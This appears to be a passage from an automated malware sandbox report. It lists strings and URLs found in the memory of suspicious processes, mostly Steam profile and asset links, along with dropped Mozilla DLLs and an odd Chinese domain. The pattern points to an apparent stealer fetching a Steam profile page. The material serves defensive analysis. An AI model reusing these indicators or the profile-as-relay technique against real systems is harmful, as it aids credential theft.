                    Source: katDDA4.tmp, 0000000C.00000002.2532896243.000000000043C000.00000040.00000400.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2114692645.0000000000991000.00000004.00000020.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2085052151.0000000000991000.00000004.00000020.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2129661356.0000000000992000.00000004.00000020.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2144632677.0000000000992000.00000004.00000020.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2099605287.0000000000991000.00000004.00000020.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000002.2536713004.0000000000995000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.12.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/css/skin_1/modalContent.css?v=.TP5s6TzX6LLh&amp;
                    Source: katDDA4.tmp, 0000000C.00000002.2532896243.000000000043C000.00000040.00000400.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2114692645.0000000000991000.00000004.00000020.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2085052151.0000000000991000.00000004.00000020.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2129661356.0000000000992000.00000004.00000020.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2144632677.0000000000992000.00000004.00000020.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2099605287.0000000000991000.00000004.00000020.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000002.2536713004.0000000000995000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.12.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/css/skin_1/profilev2.css?v=gNE3gksLVEVa&amp;l=en
                    Source: katDDA4.tmp, 0000000C.00000002.2532896243.000000000043C000.00000040.00000400.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2085052151.0000000000991000.00000004.00000020.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2069461479.0000000000956000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.12.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/images/skin_1/arrowDn9x5.gif
                    Source: katDDA4.tmp, 0000000C.00000003.2085052151.0000000000991000.00000004.00000020.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2069461479.0000000000956000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.12.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=1
                    Source: katDDA4.tmp, 0000000C.00000002.2532896243.000000000043C000.00000040.00000400.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2085052151.0000000000991000.00000004.00000020.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2069461479.0000000000956000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.12.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/applications/community/libraries~b28b
                    Source: katDDA4.tmp, 0000000C.00000002.2532896243.000000000043C000.00000040.00000400.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2085052151.0000000000991000.00000004.00000020.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2069461479.0000000000956000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.12.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/applications/community/main.js?v=7tll
                    Source: katDDA4.tmp, 0000000C.00000002.2532896243.000000000043C000.00000040.00000400.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2085052151.0000000000991000.00000004.00000020.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2069461479.0000000000956000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.12.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/applications/community/manifest.js?v=
                    Source: katDDA4.tmp, 0000000C.00000002.2532896243.000000000043C000.00000040.00000400.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2085052151.0000000000991000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.12.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/global.js?v=PyuRtGtUpR0t&amp;l=englis
                    Source: katDDA4.tmp, 0000000C.00000002.2532896243.000000000043C000.00000040.00000400.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2085052151.0000000000991000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.12.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/jquery-1.11.1.min.js?v=.isFTSRckeNhC&
                    Source: katDDA4.tmp, 0000000C.00000002.2532896243.000000000043C000.00000040.00000400.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2085052151.0000000000991000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.12.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/modalContent.js?v=Wd0kCESeJquW&amp;l=
                    Source: katDDA4.tmp, 0000000C.00000002.2532896243.000000000043C000.00000040.00000400.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2085052151.0000000000991000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.12.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/modalv2.js?v=dfMhuy-Lrpyo&amp;l=engli
                    Source: katDDA4.tmp, 0000000C.00000002.2532896243.000000000043C000.00000040.00000400.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2085052151.0000000000991000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.12.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/profile.js?v=X93cgZRtuH6z&amp;l=engli
                    Source: katDDA4.tmp, 0000000C.00000002.2532896243.000000000043C000.00000040.00000400.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2085052151.0000000000991000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.12.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/promo/stickers.js?v=GfA42_x2_aub&amp;
                    Source: katDDA4.tmp, 0000000C.00000002.2532896243.000000000043C000.00000040.00000400.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2114692645.0000000000991000.00000004.00000020.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2085052151.0000000000991000.00000004.00000020.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2129661356.0000000000992000.00000004.00000020.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2144632677.0000000000992000.00000004.00000020.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2099605287.0000000000991000.00000004.00000020.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000002.2536713004.0000000000995000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.12.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/prototype-1.7.js?v=.55t44gwuwgvw&amp;
                    Source: katDDA4.tmp, 0000000C.00000002.2532896243.000000000043C000.00000040.00000400.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2085052151.0000000000991000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.12.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/reportedcontent.js?v=dAtjbcZMWhSe&amp
                    Source: katDDA4.tmp, 0000000C.00000002.2532896243.000000000043C000.00000040.00000400.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2085052151.0000000000991000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.12.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=OeNIgrpE
                    Source: katDDA4.tmp, 0000000C.00000002.2532896243.000000000043C000.00000040.00000400.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2085052151.0000000000991000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.12.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/webui/clientcom.js?v=1rP88j3WZLBx&amp
                    Source: katDDA4.tmp, 0000000C.00000002.2532896243.000000000043C000.00000040.00000400.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2114692645.0000000000991000.00000004.00000020.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2085052151.0000000000991000.00000004.00000020.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2129661356.0000000000992000.00000004.00000020.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2144632677.0000000000992000.00000004.00000020.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2099605287.0000000000991000.00000004.00000020.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000002.2536713004.0000000000995000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.12.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/css/buttons.css?v=tuNiaSwXwcYT&amp;l=engl
                    Source: 76561199689717899[1].htm.12.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/css/motiva_sans.css?v=GfSjbGKcNYaQ&amp;l=
                    Source: katDDA4.tmp, 0000000C.00000002.2532896243.000000000043C000.00000040.00000400.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2114692645.0000000000991000.00000004.00000020.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2085052151.0000000000991000.00000004.00000020.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2129661356.0000000000992000.00000004.00000020.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2144632677.0000000000992000.00000004.00000020.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2099605287.0000000000991000.00000004.00000020.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000002.2536713004.0000000000995000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.12.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/css/shared_global.css?v=E0c90DJSB6Ld&amp;
                    Source: katDDA4.tmp, 0000000C.00000002.2532896243.000000000043C000.00000040.00000400.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2114692645.0000000000991000.00000004.00000020.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2085052151.0000000000991000.00000004.00000020.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2129661356.0000000000992000.00000004.00000020.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2144632677.0000000000992000.00000004.00000020.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2099605287.0000000000991000.00000004.00000020.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000002.2536713004.0000000000995000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.12.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/css/shared_responsive.css?v=eghn9DNyCY67&
                    Source: katDDA4.tmp, 0000000C.00000002.2532896243.000000000043C000.00000040.00000400.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2085052151.0000000000991000.00000004.00000020.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2069461479.0000000000956000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.12.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/images/header/logo_steam.svg?t=962016
                    Source: katDDA4.tmp, 0000000C.00000002.2532896243.000000000043C000.00000040.00000400.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2085052151.0000000000991000.00000004.00000020.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2069461479.0000000000956000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.12.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/images/responsive/header_logo.png
                    Source: katDDA4.tmp, 0000000C.00000002.2532896243.000000000043C000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/images/responsive/header_menu
                    Source: katDDA4.tmp, 0000000C.00000002.2532896243.000000000043C000.00000040.00000400.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2085052151.0000000000991000.00000004.00000020.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2069461479.0000000000956000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.12.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.p
                    Source: katDDA4.tmp, 0000000C.00000002.2532896243.000000000043C000.00000040.00000400.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2085052151.0000000000991000.00000004.00000020.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2069461479.0000000000956000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.12.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/images/responsive/logo_valve_footer.png
                    Source: katDDA4.tmp, 0000000C.00000002.2532896243.000000000043C000.00000040.00000400.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2085052151.0000000000991000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.12.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/javascript/shared_global.js?v=wJD9maDpDcV
                    Source: katDDA4.tmp, 0000000C.00000002.2532896243.000000000043C000.00000040.00000400.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2085052151.0000000000991000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.12.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/javascript/shared_responsive_adapter.js?v
                    Source: katDDA4.tmp, 0000000C.00000002.2532896243.000000000043C000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/javascript/tooltip.js?v
                    Source: katDDA4.tmp, 0000000C.00000003.2085052151.0000000000991000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.12.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/javascript/tooltip.js?v=.zYHOpI1L3Rt0&amp
                    Source: katDDA4.tmp, 0000000C.00000002.2536713004.00000000009D7000.00000004.00000020.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000002.2536713004.00000000009AA000.00000004.00000020.00020000.00000000.sdmp, HIJJEG.12.drString found in binary or memory: https://contile-images.services.mozilla.com/CuERQnIs4CzqjKBh9os6_h9d4CUDCHO3oiqmAQO6VLM.25122.jpg
                    Source: katDDA4.tmp, 0000000C.00000002.2536713004.00000000009D7000.00000004.00000020.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000002.2536713004.00000000009AA000.00000004.00000020.00020000.00000000.sdmp, HIJJEG.12.drString found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
                    Source: 5876.exe, 00000007.00000003.1743881764.0000000002CA6000.00000004.00000800.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2236009021.0000000000A20000.00000004.00000020.00020000.00000000.sdmp, GHDBAF.12.drString found in binary or memory: https://duckduckgo.com/ac/?q=
                    Source: 5876.exe, 00000007.00000003.1743881764.0000000002CA6000.00000004.00000800.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2236009021.0000000000A20000.00000004.00000020.00020000.00000000.sdmp, GHDBAF.12.drString found in binary or memory: https://duckduckgo.com/chrome_newtab
                    Source: 5876.exe, 00000007.00000003.1743881764.0000000002CA6000.00000004.00000800.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2236009021.0000000000A20000.00000004.00000020.00020000.00000000.sdmp, GHDBAF.12.drString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                    Source: explorer.exe, 00000002.00000000.1406666637.000000000BBB0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://excel.office.com
                    Source: katDDA4.tmp, 0000000C.00000003.2068424955.0000000000963000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://help.steampowered.com/
                    Source: katDDA4.tmp, 0000000C.00000002.2532896243.000000000043C000.00000040.00000400.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2085052151.0000000000991000.00000004.00000020.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2069461479.0000000000956000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.12.drString found in binary or memory: https://help.steampowered.com/en/
                    Source: explorer.exe, 00000002.00000000.1401695324.0000000006F0F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA11f7Wa.img
                    Source: explorer.exe, 00000002.00000000.1401695324.0000000006F0F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA15Yat4.img
                    Source: explorer.exe, 00000002.00000000.1401695324.0000000006F0F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA1b2aMG.img
                    Source: explorer.exe, 00000002.00000000.1401695324.0000000006F0F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA1bjET8.img
                    Source: explorer.exe, 00000002.00000000.1401695324.0000000006F0F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA1hGNsX.img
                    Source: explorer.exe, 00000002.00000000.1401695324.0000000006F0F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAT0qC2.img
                    Source: explorer.exe, 00000002.00000000.1401695324.0000000006F0F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBNvr53.img
                    Source: explorer.exe, 00000002.00000000.1401695324.0000000006F0F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBYTL1i.img
                    Source: HIJJEG.12.drString found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4pqX1CqX4pbW1pbWfpbZ7ReNxR3UIG8zInwYIFIVs9eYi
                    Source: explorer.exe, 00000002.00000000.1406666637.000000000BC80000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://java.co
                    Source: katDDA4.tmp, 0000000C.00000003.2068424955.0000000000963000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.steampowered.com/
                    Source: katDDA4.tmp, 0000000C.00000003.2069461479.0000000000991000.00000004.00000020.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2068424955.0000000000963000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lv.queniujq.cn
                    Source: katDDA4.tmp, 0000000C.00000003.2069461479.0000000000991000.00000004.00000020.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2068424955.0000000000963000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://medal.tv
                    Source: katDDA4.tmp, 0000000C.00000003.2272187198.00000000009FF000.00000004.00000020.00020000.00000000.sdmp, freebl3[1].dll.12.dr, mozglue[1].dll.12.dr, freebl3.dll.12.dr, nss3.dll.12.dr, softokn3[1].dll.12.drString found in binary or memory: https://mozilla.org0/
                    Source: explorer.exe, 00000002.00000000.1406666637.000000000BBB0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://outlook.com
                    Source: katDDA4.tmp, 0000000C.00000003.2069461479.0000000000991000.00000004.00000020.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2068424955.0000000000963000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://player.vimeo.com
                    Source: explorer.exe, 00000002.00000000.1406666637.000000000BBB0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://powerpoint.office.comer
                    Source: katDDA4.tmp, 0000000C.00000003.2069461479.0000000000991000.00000004.00000020.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2068424955.0000000000963000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://recaptcha.net
                    Source: katDDA4.tmp, 0000000C.00000003.2069461479.0000000000991000.00000004.00000020.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2068424955.0000000000963000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://recaptcha.net/recaptcha/;
                    Source: katDDA4.tmp, 0000000C.00000003.2069461479.0000000000991000.00000004.00000020.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2068424955.0000000000963000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://s.ytimg.com;
                    Source: katDDA4.tmp, 0000000C.00000003.2069461479.0000000000991000.00000004.00000020.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2068424955.0000000000963000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sketchfab.com
                    Source: katDDA4.tmp, 0000000C.00000003.2069461479.0000000000991000.00000004.00000020.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2068424955.0000000000963000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steam.tv/
                    Source: katDDA4.tmp, 0000000C.00000003.2069461479.0000000000991000.00000004.00000020.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2068424955.0000000000963000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steambroadcast-test.akamaized.net
                    Source: katDDA4.tmp, 0000000C.00000003.2069461479.0000000000991000.00000004.00000020.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2068424955.0000000000963000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steambroadcast.akamaized.net
                    Source: katDDA4.tmp, 0000000C.00000003.2069461479.0000000000991000.00000004.00000020.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2068424955.0000000000963000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steambroadcastchat.akamaized.net
                    Source: 76561199689717899[1].htm.12.drString found in binary or memory: https://steamcommunity.com/
                    Source: katDDA4.tmp, 0000000C.00000002.2532896243.000000000043C000.00000040.00000400.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2085052151.0000000000991000.00000004.00000020.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2069461479.0000000000956000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.12.drString found in binary or memory: https://steamcommunity.com/?subsection=broadcasts
                    Source: katDDA4.tmp, 0000000C.00000002.2532896243.000000000043C000.00000040.00000400.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2085052151.0000000000991000.00000004.00000020.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2069461479.0000000000956000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.12.drString found in binary or memory: https://steamcommunity.com/discussions/
                    Source: katDDA4.tmp, 0000000C.00000002.2532896243.000000000043C000.00000040.00000400.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2085052151.0000000000991000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.12.drString found in binary or memory: https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.org
                    Source: katDDA4.tmp, 0000000C.00000002.2532896243.000000000043C000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/login/home/?go
                    Source: 76561199689717899[1].htm.12.drString found in binary or memory: https://steamcommunity.com/login/home/?goto=profiles%2F76561199689717899
                    Source: katDDA4.tmp, 0000000C.00000002.2532896243.000000000043C000.00000040.00000400.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2085052151.0000000000991000.00000004.00000020.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2069461479.0000000000956000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.12.drString found in binary or memory: https://steamcommunity.com/market/
                    Source: katDDA4.tmp, 0000000C.00000002.2532896243.000000000043C000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/my/wish
                    Source: katDDA4.tmp, 0000000C.00000002.2532896243.000000000043C000.00000040.00000400.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2085052151.0000000000991000.00000004.00000020.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2069461479.0000000000956000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.12.drString found in binary or memory: https://steamcommunity.com/my/wishlist/
                    Source: EE6.exe, 0000000B.00000002.2056487759.00000000044B0000.00000004.00001000.00020000.00000000.sdmp, EE6.exe, 0000000B.00000002.2056395871.0000000004470000.00000040.00001000.00020000.00000000.sdmp, EE6.exe, 0000000B.00000002.2056003216.0000000004170000.00000040.00001000.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000002.2532896243.0000000000422000.00000040.00000400.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2085052151.000000000096E000.00000004.00000020.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2099605287.0000000000983000.00000004.00000020.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2069461479.0000000000972000.00000004.00000020.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2069461479.0000000000983000.00000004.00000020.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000002.2536713004.0000000000929000.00000004.00000020.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2085052151.0000000000983000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199689717899
                    Source: katDDA4.tmp, 0000000C.00000002.2532896243.000000000043C000.00000040.00000400.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2085052151.0000000000991000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.12.drString found in binary or memory: https://steamcommunity.com/profiles/76561199689717899/badges
                    Source: katDDA4.tmp, 0000000C.00000002.2532896243.000000000043C000.00000040.00000400.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2085052151.0000000000991000.00000004.00000020.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2069461479.0000000000956000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.12.drString found in binary or memory: https://steamcommunity.com/profiles/76561199689717899/inventory/
                    Source: katDDA4.tmp, 0000000C.00000002.2532896243.0000000000422000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199689717899r0isMozilla/5.0
                    Source: katDDA4.tmp, 0000000C.00000002.2532896243.000000000043C000.00000040.00000400.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2085052151.0000000000991000.00000004.00000020.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2069461479.0000000000956000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.12.drString found in binary or memory: https://steamcommunity.com/workshop/
                    Source: 76561199689717899[1].htm.12.drString found in binary or memory: https://store.steampowered.com/
                    Source: katDDA4.tmp, 0000000C.00000003.2069461479.0000000000991000.00000004.00000020.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2068424955.0000000000963000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/;
                    Source: 76561199689717899[1].htm.12.drString found in binary or memory: https://store.steampowered.com/about/
                    Source: katDDA4.tmp, 0000000C.00000002.2532896243.000000000043C000.00000040.00000400.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2085052151.0000000000991000.00000004.00000020.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2069461479.0000000000956000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.12.drString found in binary or memory: https://store.steampowered.com/explore/
                    Source: katDDA4.tmp, 0000000C.00000002.2532896243.000000000043C000.00000040.00000400.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2085052151.0000000000991000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.12.drString found in binary or memory: https://store.steampowered.com/legal/
                    Source: katDDA4.tmp, 0000000C.00000002.2532896243.000000000043C000.00000040.00000400.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2085052151.0000000000991000.00000004.00000020.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2069461479.0000000000956000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.12.drString found in binary or memory: https://store.steampowered.com/mobile
                    Source: katDDA4.tmp, 0000000C.00000002.2532896243.000000000043C000.00000040.00000400.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2085052151.0000000000991000.00000004.00000020.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2069461479.0000000000956000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.12.drString found in binary or memory: https://store.steampowered.com/news/
                    Source: katDDA4.tmp, 0000000C.00000003.2069461479.0000000000956000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.12.drString found in binary or memory: https://store.steampowered.com/points/shop/
